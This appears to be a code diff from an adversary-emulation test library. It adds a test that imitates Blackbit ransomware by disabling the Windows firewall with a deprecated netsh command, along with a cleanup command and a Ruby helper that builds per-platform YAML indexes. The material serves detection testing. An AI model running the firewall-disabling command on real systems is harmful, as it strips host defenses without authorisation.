 - [Atomic Test #17 - LockBit Black - Unusual Windows firewall registry modification -Powershell](#atomic-test-17---lockbit-black---unusual-windows-firewall-registry-modification--powershell)

+- [Atomic Test #18 - Blackbit - Disable Windows Firewall using netsh firewall](#atomic-test-18---blackbit---disable-windows-firewall-using-netsh-firewall)
+

 <br/>

@@ -734,4 +736,36 @@ Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardP



+<br/>
+<br/>
+
+## Atomic Test #18 - Blackbit - Disable Windows Firewall using netsh firewall
+An adversary tries to modify the windows firewall configuration using the deprecated netsh firewall command (command still works).
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 91f348e6-3760-4997-a93b-2ceee7f254ee
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+netsh firewall set opmode mode=disable
+```
+
+#### Cleanup Commands:
+```cmd
+netsh firewall set opmode mode=enable >nul 2>&1
+```
+
+
+
+
+
 <br/>
@@ -326,4 +326,17 @@ atomic_tests:
       Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile"  -Name EnableFirewall -Force -ErrorAction Ignore
       Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -Force -ErrorAction Ignore
    name: powershell
-    elevation_required: true 
+    elevation_required: true
+- name: Blackbit - Disable Windows Firewall using netsh firewall
+  auto_generated_guid: 91f348e6-3760-4997-a93b-2ceee7f254ee
+  description: |
+     An adversary tries to modify the windows firewall configuration using the deprecated netsh firewall command (command still works).     
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      netsh firewall set opmode mode=disable
+    cleanup_command: |
+      netsh firewall set opmode mode=enable >nul 2>&1
+    name: command_prompt
+    elevation_required: true  
@@ -1217,3 +1217,14 @@ c6952f41-6cf0-450a-b352-2ca8dae7c178
 15330820-d405-450b-bd08-16b5be5be9f4
 8cd1947b-4a54-41fb-b5ea-07d0ace04f81
 8851b73a-3624-4bf7-8704-aa312411565c
+91f348e6-3760-4997-a93b-2ceee7f254ee
+39f1f378-ba8a-42b3-96dc-2a6540cfc1e3
+35727d9e-7a7f-4d0c-a259-dc3906d6e8b9
+336b25bf-4514-4684-8924-474974f28137
+7617f689-bbd8-44bc-adcd-6f8968897848
+78b274f8-acb0-428b-b1f7-7b0d0e73330a
+31e794c4-48fd-4a76-aca4-6587c155bc11
+7b38e5cc-47be-44f0-a425-390305c76c17
+bf23c7dc-1004-4949-8262-4c1d1ef87702
+b04ed73c-7d43-4dc8-b563-a2fc595cba1a
+5bec4cc8-f41e-437b-b417-33ff60acf9af
@@ -59,6 +59,9 @@ class AtomicRedTeamDocs
    generate_index_csv!  "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Indexes-CSV/azure-ad-index.csv", only_platform: /azure-ad/

    generate_yaml_index! "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/index.yaml"
+    ["windows", "macos", "linux", "office-365", "azure-ad", "google-workspace", "saas", "iaas", "containers", "iaas:gcp", "iaas:azure", "iaas:aws"].each do | platform|
+      generate_yaml_index_by_platform! "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/#{platform.gsub(':','_')}-index.yaml", platform: "#{platform}"
+    end
    generate_navigator_layer! "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json", \
      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json", \
      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json", \
@@ -176,6 +179,29 @@ class AtomicRedTeamDocs
    puts "Generated Atomic Red Team CSV indexes at #{output_doc_path_by_tactic}"
  end

+  #
+  # Generates a master YAML index of ATT&CK Tactic -> Technique -> Atomic Tests
+  #
+  def generate_yaml_index_by_platform!(output_doc_path, platform)
+    result = {}
+
+    ATTACK_API.techniques_by_tactic.each do |tactic, techniques|
+      result[tactic] = techniques.collect do |technique|
+        [
+            technique['external_references'][0]['external_id'],
+            {
+                'technique' => technique,
+                'atomic_tests' => ATOMIC_RED_TEAM.atomic_tests_for_technique_by_platform(technique, platform)
+            }
+        ]
+      end.to_h
+    end
+
+    File.write output_doc_path, JSON.parse(result.to_json).to_yaml # shenanigans to eliminate YAML aliases
+
+    puts "Generated Atomic Red Team YAML index at #{output_doc_path}"
+  end
+
  #
  # Generates a master YAML index of ATT&CK Tactic -> Technique -> Atomic Tests
  #